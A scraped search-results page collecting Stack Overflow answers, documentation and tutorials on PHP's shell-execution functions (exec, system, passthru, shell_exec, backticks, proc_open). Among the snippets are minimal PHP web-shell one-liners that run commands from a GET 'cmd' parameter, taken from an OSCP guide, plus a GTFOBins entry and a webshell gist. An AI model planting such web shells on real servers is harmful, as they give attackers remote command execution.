They have slightly different purposes.
exec()is for calling a system command, and perhaps dealing with the output yourself.system()is for executing a system command and immediately displaying the output - presumably text.passthru()is for executing a system command which you wish the raw return from - presumably something binary.
Regardless, I suggest you not use any of them. They all produce highly unportable code.
Answer from Kalium on Stack OverflowPHP
php.net › manual › en › function.system.php
PHP: system - Manual
For example: system("timeconfig > /dev/tty < /dev/tty"); System will wait for the program to finish before continuing. ... another reason to use shell_exec instead of system is when the result is multiple lines such as grep or ls <?php // this correctly sets answer string to all lines found //$answer = shell_exec ("grep 'set of color names' *.php "); //echo "answer = $answer"; // this passes all lines to output (they show on page) // and sets answer string to the final line $sys = system ("grep 'set of color names' *.php "); echo "sys =(($sys))"; ?> here is view/source resulting from system ca
Top answer 1 of 5
220
They have slightly different purposes.
exec()is for calling a system command, and perhaps dealing with the output yourself.system()is for executing a system command and immediately displaying the output - presumably text.passthru()is for executing a system command which you wish the raw return from - presumably something binary.
Regardless, I suggest you not use any of them. They all produce highly unportable code.
2 of 5
173
The previous answers seem all to be a little confusing or incomplete, so here is a table of the differences...
+----------------+-----------------+----------------+----------------+
| Command | Displays Output | Can Get Output | Gets Exit Code |
+----------------+-----------------+----------------+----------------+
| system() | Yes (as text) | Last line only | Yes |
| passthru() | Yes (raw) | No | Yes |
| exec() | No | Yes (array) | Yes |
| shell_exec() | No | Yes (string) | No |
| backticks (``) | No | Yes (string) | No |
+----------------+-----------------+----------------+----------------+
- "Displays Output" means it streams the output to the browser (or command line output if running from a command line).
- "Can Get Output" means you can get the output of the command and assign it to a PHP variable.
- The "exit code" is a special value returned by the command (also called the "return status"). Zero usually means it was successful, other values are usually error codes.
Other misc things to be aware of:
- The shell_exec() and the backticks operator do the same thing.
- There are also proc_open() and popen() which allow you to interactively read/write streams with an executing command.
- Add "2>&1" to the command string if you also want to capture/display error messages.
- Use escapeshellcmd() to escape command arguments that may contain problem characters.
- If passing an $output variable to exec() to store the output, if $output isn't empty, it will append the new output to it. So you may need to unset($output) first.
PHP system() function - does it use shell to execute command? - Stack Overflow
I read a related post and I get the impression that the system() function in php does not use a shell. But then saw the following example posted on owasp - example 6 on the page: The following PHP... More on stackoverflow.com
Executing unix shell commands using PHP - Stack Overflow
Oh, and running arbitrary commands from your users is perhaps one of the greatest security risks that you could ever conceive of, but I kind of assume you know this by now. ... But like sdleihssirhc mentioned, watchout this IS very dangerous and you should NOT allow everything to be executed! If you still want to do it, to get the output of the shell, just use · exec The output of the shell will be passed in the second parameter. ... See http://php.net/system ... More on stackoverflow.com
Using PHP to execute cmd commands - Stack Overflow
How do I properly execute commands ... using php? For example I'm using the command below in the command line to convert a docx file into a pdf file: ... ### Update Do you get any errors in your logs? What happens if you wrap that shell_exec call in a var_export? ### Original Have you tried system() ... More on stackoverflow.com
Spawning a separate process for a long task
I've been using it for a couple of years with a default PHP & Apache2 config. Haven't had any problems. ... shell_exec is a very dangerous command and in general not the way things should be done. More on reddit.com
39
17
September 21, 2012What is a web shell?
A web shell is a small application that an attacker runs on your web server. They can then use this application to remotely access your server and run commands on it. A web shell by itself is never an attack, it is the aftermath of a successful attack on your website or web application. This means that if you have a web shell, you have a much more serious problem to worry about.
See how a web shell works in practice.
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
How do malicious hackers use web shells?
Malicious hackers use web shells to take control of an already compromised server. First, they exploit a vulnerability in your website or web application such as SQL injection, remote code execution, or others. Then, they upload a web shell to your web server. From now on, they can run any commands that they like on your server.
See a step-by-step example of an attack that leads to full server compromise.
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
How can I detect web shells?
You can detect web shells by log analysis. However, you should not focus on detecting web shells but instead, you should detect vulnerabilities that can let attackers take control of your server. Even if you detect a web shell, that will not stop attackers from taking over control again if the vulnerabilities are still there. To detect web vulnerabilities and learn how to eliminate them, use Acunetix.
See what Acunetix Premium can do for you.
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
Videos
06:51
Execute Shell commands with PHP #php - YouTube
03:09
Running System Commands in PHP - PHP Tutorial Beginner to Advanced ...
41:36
PHP - Send Shell Commands with shell_exec() - YouTube
05:01
PHP Interactive shell // Execute PHP code inside your terminal/CMD ...
00:09
Executing System Commands in PHP - YouTube
Acunetix
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
March 5, 2025 - Surprisingly, not many PHP developers are aware of this but PHP will execute the contents of backticks (`) as a shell command. Note: The backtick character (`) should not to be confused with the single quote character (‘) <?php $output = `whoami`; echo "<pre>$output</pre>"; ?> --> www-data · Based on the above, the following is a PHP web shell in its simplest form. ... It uses the system() function to execute commands that are being passed through ‘cmd’ HTTP request GET parameter.
GitHub
github.com › mikehaertl › php-shellcommand
GitHub - mikehaertl/php-shellcommand: A simple object oriented interface to execute shell commands in PHP · GitHub
<?php use mikehaertl\shellcommand\Command; // Basic example $command = new Command('/usr/local/bin/mycommand -a -b'); if ($command->execute()) { echo $command->getOutput(); } else { echo $command->getError(); $exitCode = $command->getExitCode(); }
Starred by 324 users
Forked by 55 users
Languages PHP
Tutorialspoint
tutorialspoint.com › php › php_system_calls.htm
PHP System Calls
PATH=C:\Python311\Scripts\;C:\Python311\;C:\WINDOWS\system32;C:\WINDOWS; C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\; C:\WINDOWS\System32\OpenSSH\;C:\xampp\php;C:\Users\mlath\AppData\Local \Microsoft\WindowsApps;C:\VSCode\Microsoft VS Code\bin · PHP supports one execution operator: backticks (``). (they are not single-quotes!) PHP will attempt to execute the contents of the backticks as a shell command; the output will be returned.
BCCNsoft
doc.bccnsoft.com › docs › php-docs-7-en › function.system.html
Execute an external program and display the output
<?php echo '<pre>'; // Outputs all the result of shellcommand "ls", and returns // the last output line into $last_line. Stores the return value // of the shell command in $retval. $last_line = system('ls', $retval); // Printing additional info echo ' </pre> <hr />Last line of the output: ' .
Anto
anto.online › home › code › how to execute shell commands via php
How to execute shell commands via PHP - Anto ./online
June 17, 2022 - The PHP functions to execute shell command are: shell_exec(), exec() or system(). These functions are remarkably similar but have slight differences.
GitBooks
sushant747.gitbooks.io › total-oscp-guide › content › webshell.html
Webshell · Total OSCP Guide - sushant747
shell.php?cmd=whoami <?php system($_GET['cmd']); ?> # The same but using passthru <?php passthru($_GET['cmd']); ?> # For shell_exec to output the result you need to echo it <?php echo shell_exec("whoami");?> # Exec() does not output the result without echo, and only output the last line.
Gtfobins
gtfobins.org › gtfobins › php
php | GTFOBins
php -r 'echo shell_exec("/path/to/command");' Sudo
Linux Hint
linuxhint.com › execute_shell_command_php
Execute Shell Command in PHP using exec() – Linux Hint
How this function can be used in PHP are shown in this tutorial. string exec ( string $command [, array &$output [, int &$return_var ]] ) This function can take three arguments. The first argument is mandatory that will take the system command. The other two arguments are optional.
GeeksforGeeks
geeksforgeeks.org › php › php-shell_exec-vs-exec-function
PHP shell_exec() vs exec() Function - GeeksforGeeks
July 11, 2025 - While shell_exec() returns the ... more control over output handling. The shell_exec() function in PHP executes a command via the shell and returns the complete output as a string....
Top answer 1 of 2
4
It does use the shell. I didn't see any answer in the question you linked to that said it doesn't.
The documentation says:
system()is just like the C version of the function in that it executes the given command and outputs the result.
Since the C function uses the shell, so does the PHP function.
The documentation is slightly misleading, because the C function doesn't return any of the output of the command, while the PHP function returns the last line of the output.
2 of 2
3
Yes, and this example will show you :
echo system("echo $0");
Top answer 1 of 7
13
exec?
system?
shell_exec?
passthru?
Backticks?
Pfah!
Real developers use proc_open! It has the major and distinct advantage of giving you three PHP streams to feed data into the process, and read both stdout and stderr. This is something that the other process execution functions simply don't do well.
It comes at the small cost of some boilerplate code, so it's a bit more verbose. I consider the trade-off to be excellent.
Oh, and running arbitrary commands from your users is perhaps one of the greatest security risks that you could ever conceive of, but I kind of assume you know this by now.
2 of 7
11
You could start looking at the php manual:
System program execution
But like sdleihssirhc mentioned, watchout this IS very dangerous and you should NOT allow everything to be executed!
If you still want to do it, to get the output of the shell, just use
exec
The output of the shell will be passed in the second parameter.
E.g.:
exec('ls -la', $outputArray);
print_r($outputArray);
Top answer 1 of 2
13
system("c:\\path\\to\\pdfcreator.exe /PF\"D:\\Documents\\sample.docx"");
try this.
2 of 2
6
Don't forget to escape your command with escapeshellcmd(). This will prevent you from having to use ugly backslashes and escape characters.
There are also other alternatives which may work:
`command` // back ticks drop you out of PHP mode into shell
exec('command', $output); // exec will allow you to capture the return of a command as reference
shell_exec('command'); // will return the output to a variable
system(); //as seen above.
Also, make sure your .exe is included within your $PATH variable. If not, include the full path for the command.
GitHub
gist.github.com › joswr1ght › 22f40787de19d80d110b37fb79ac3985
easy-simple-php-webshell.php · GitHub
just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project. and i am stuck here.
Piotr Horzycki
peterdev.pl › execute-a-shell-command-in-php
Executing shell commands from a PHP script | Piotr Horzycki - Java and PHP developer’s blog
April 2, 2021 - The PHP documentation recommends it in case if binary output has to be sent without interference. shell_exec() executes a command and returns the complete output as a string. It does not provide the exit code. The function return value is confusing because it can be null both if an error occured or if the command produced no output. system() acts like passthru(), but it also returns the last line of the output.